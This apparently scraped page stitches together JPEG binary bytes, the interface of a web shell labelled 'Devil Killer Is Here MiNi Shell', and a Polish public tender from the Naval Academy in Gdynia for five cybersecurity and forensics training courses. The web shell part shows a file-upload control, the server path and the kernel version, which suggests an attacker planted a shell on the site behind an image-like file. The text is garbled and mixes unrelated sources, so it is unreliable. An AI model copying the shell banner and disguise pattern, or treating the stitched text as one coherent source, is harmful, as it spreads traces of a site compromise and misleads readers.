JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250714/0032484201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie szkoleń na studiach dziennych dla studentów kierunku SIB spec. Analiza danych i informatyka śledcza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Marynarki Wojennej im. Bohaterów Westerplatte</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190064136</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Inżyniera Jana Śmidowicza, 69</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-127</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@amw.gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.amw.gdynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie szkoleń na studiach dziennych dla studentów kierunku SIB spec. Analiza danych i informatyka śledcza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96a27d18-8eea-4fc7-8fdd-53de089c45ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00324842</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00088585/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.52 Przeprowadzenie szkoleń na studiach dziennych dla studentów kierunku SIB spec. Analiza danych i informatyka śledcza .</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt nr FERS.01.05-IP.08-0277/23 „Wykwalifikowane kadry dla gospodarki” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe określenie wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarto w rozdziale 8 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AMW-KANC.SZP.2712.42.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> przeprowadzenie kursu ,,Odzyskiwanie Danych i Metody Laboratoryjne” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera prowadzącego kurs/szkolenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> przeprowadzenie kursu ,,Analiza śledcza, odzyskiwanie danych oraz inżynieria wsteczna smartfonów na potrzeby postępowań dowodowych” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera prowadzącego kurs/szkolenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> przeprowadzenie kursu ,,Certified Ethical Hacker CEHv.13 AI” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera prowadzącego kurs/szkolenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> przeprowadzenie kursu ,,Analiza Śledcza i Powłamaniowa Ataków Ransomware” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera prowadzącego kurs/szkolenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> przeprowadzenie kursu ,,Praktyczna Obsługa Incydentów Cyberbezpieczeństwa – Gra Sztabowa” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera prowadzącego kurs/szkolenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej<br/>	Opis spełnienia warunku:<br/>I.	Wykonawca musi dysponować osobami (wykaz - załącznik nr 13), Wykonawca musi dysponować osobami, które zostaną skierowane do realizacji zamówienia publicznego, w szczególności odpowiedzialne za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:<br/>Za spełnienie tego warunku Zamawiający uzna dysponowanie przez wykonawcę minimum jednym trenerem/wykładowcą/szkoleniowcem posiadającym łącznie:<br/>1.	Wykształcenie – dotyczy wszystkich części<br/>Część I - wykształcenie wyższe techniczne, preferowane kierunki: informatyka, telein-formatyka, elektronika, automatyka, elektrotechnika, mechatronika<br/>Część II - wykształcenie wyższe, preferowane kierunki: informatyka, teleinformatyka, elektronika, automatyka, cyberbezpieczeństwo<br/>Część III - wykształcenie wyższe, techniczne, preferowane kierunki: informatyka, telein-formatyka, elektronika, automatyka, cyberbezpieczeństwo, systemy informacyjne<br/>Część IV – wykształcenie wyższe techniczne, preferowane kierunki: informatyka, cyberbez-pieczeństwo, teleinformatyka, elektronika, bezpieczeństwo informacji<br/>Część V - wykształcenie wyższe techniczne lub społeczne, preferowane kierunki: in-formatyka, cyberbezpieczeństwo, bezpieczeństwo narodowe, zarządzanie kryzysowe, teleinformatyka, bezpieczeństwo informacji<br/>2.	Doświadczenie zawodowe obejmujące pracę na uczelni wyższej jako wykładowca przez okres minimum 5 lat, przy czym za zaliczony rok uznaje się przeprowadzenie min. 16 godzin w roku akademickim – dotyczy wszystkich części<br/>Część I - w dziedzinach związanych z informatyką, elektroniką, bezpieczeństwem systemów informacyjnych lub cyfrową analizą danych<br/>Część II - w obszarze informatyki, cyberbezpieczeństwa, inżynierii oprogramowania lub pokrewnym<br/>Część III - w zakresie bezpieczeństwa systemów komputerowych, sieci komputerowych lub testowania zabezpieczeń<br/>Część IV – w dziedzinach związanych z informatyką śledczą, bezpieczeństwem systemów in-formatycznych lub analizą malware<br/>Część V - w dziedzinach związanych z bezpieczeństwem systemów IT, zarządzaniem incy-dentami lub cyberbezpieczeństwem<br/>3.	Doświadczenie zawodowe w obszarze, z którego przeprowadzane będzie szkolenie (obej-mujące 5 lat i nabyte po 01.01.2018r.) – dotyczy wszystkich części<br/>Część I - w pracy z odzyskiwaniem danych na poziomie laboratoryjnym, w tym:<br/>•	analiza i naprawa fizycznie uszkodzonych nośników (HDD, SSD, flash),<br/>•	odzyskiwanie danych po usunięciu, sformatowaniu, zaszyfrowaniu lub uszkodzeniu logicz-nym/elektrycznym,<br/>•	praca w firmach data recovery, laboratoriach informatyki śledczej, służbach lub fir-mach zajmujących się analizą nośników danych,<br/>Część II - w pracy z odzyskiwaniem danych oraz analizą urządzeń mobilnych na poziomie laboratoryjnym, np. w:<br/>•	laboratoriach informatyki śledczej,<br/>•	firmach zajmujących się data recovery,<br/>•	jednostkach zajmujących się analizą urządzeń mobilnych w celach dowodowych (np. służ-by, kancelarie biegłych, instytucje publiczne)<br/>Część III - w prowadzeniu testów penetracyjnych, audytów bezpieczeństwa lub analiz podat-ności w sektorze prywatnym, publicznym lub instytucjach bezpieczeństwa (np. CERT, SOC, CISO teams) oraz szkoleń z zakresu testów penetracyjnych, etycznego hackingu i cyberbezpie-czeństwa, zgodnie ze standardami organizacji EC-Council<br/>Część IV - z zakresu prowadzeniu rzeczywistych analiz powłamaniowych lub działań z zakresu informatyki śledczej w incydentach ransomware – np.:<br/>•	w zespołach CERT/SOC/CIRT,<br/>•	w firmach zajmujących się IR (incident response),<br/>•	w instytucjach publicznych lub służbach zajmujących się przestępczością komputerową<br/>Część V - w praktycznym zarządzaniu incydentami bezpieczeństwa – np. w zespołach CERT, CSIRT, SOC lub w strukturach zarządzania kryzysowego z elementem cyber (np. administra-cja, sektor finansowy, infrastruktura krytyczna)<br/>4.	Przeprowadzenie co najmniej 5 szkoleń z zakresu tematycznego zgodnie z przedmiotem zamówienia w okresie ostatnich 3-ch lat – dotyczy wszystkich części<br/>Część I- szkolenia z zakresu odzyskiwania danych, informatyki śledczej lub analizy nośników danych<br/>Część II - szkolenia z zakresu mobile forensics, analizy powłamaniowej, odzyskiwania danych z urządzeń mobilnych lub inżynierii wstecznej aplikacji mobilnych<br/>Część III - realizacja pełnych edycji szkoleń przygotowujących do egzaminu Certified Ethi-cal Hacker CEHv.13 AI, zakończonych egzaminem certyfikującym<br/>Część IV - szkolenia z zakresu analizy incydentów ransomware, informatyki śledczej,reverse engineeringu złośliwego oprogramowania, reagowania na cyberataki<br/>Część V - szkolenia z zakresu obsługi incydentów cyberbezpieczeństwa, reagowania na incy-denty lub zarządzania kryzysowego z komponentem IT/cyber<br/>5.	Posiadanie :<br/>1)	Część I – posiadanie minimum 2 certyfikatów z pośród niżej wymienionych:<br/>•	CFCE<br/>•	GCFE<br/>•	EnCE (EnCase Certified Examiner),<br/>•	CHFI (Computer Hacking Forensic Investigator),<br/>•	ACE<br/>•	Cellebrite (w zakresie pracy z fizycznymi nośnikami).<br/>2) Część II - posiadanie minimum 2 certyfikatów z pośród niżej wymienionych:<br/>•	Cellebrite <br/>•	Magnet AXIOM (MCFE),<br/>•	XRY/XAMN (MSAB),<br/>•	CHFI, EnCE, ACE, X-Ways,<br/>•	GIAC GREM / GCFA, GCFE.<br/>3)	Część III - posiadanie Certified Ethical Hacker CEHv.13 AI<br/>4)	Część IV - posiadanie minimum 2 certyfikatów z pośród niżej wymienionych:<br/>•	CHFI (Computer Hacking Forensic Investigator),<br/>•	GCFA (GIAC Certified Forensic Analyst),<br/>•	GCFE (GIAC Certified Forensic Examiner),<br/>•	GREM (GIAC Reverse Engineering Malware),<br/>•	CEH, OSCP, X-Ways, Magnet AXIOM, EnCE <br/>•	CFCE<br/>5)	Część V- posiadanie minimum 2 certyfikatów z pośród niżej wymienionych:<br/>•	CHFI (Computer Hacking Forensic Investigator),<br/>•	GCFA (GIAC Certified Forensic Analyst),<br/>•	GCFE (GIAC Certified Forensic Examiner),<br/>•	GREM (GIAC Reverse Engineering Malware),<br/>•	CEH, OSCP, X-Ways, Magnet AXIOM, EnCE <br/>•	CFCE<br/> Spełnienie warunków do każdej z części proszę wykazać wypełniając dedykowany załącznik:<br/>Część I - (załącznik nr 14)<br/>Część II - (załącznik nr 15)<br/>Część III - (załącznik nr 16)<br/>Część IV - (załącznik nr 17)<br/>Część V- (Załącznik nr 18)<br/><br/><br/>II.	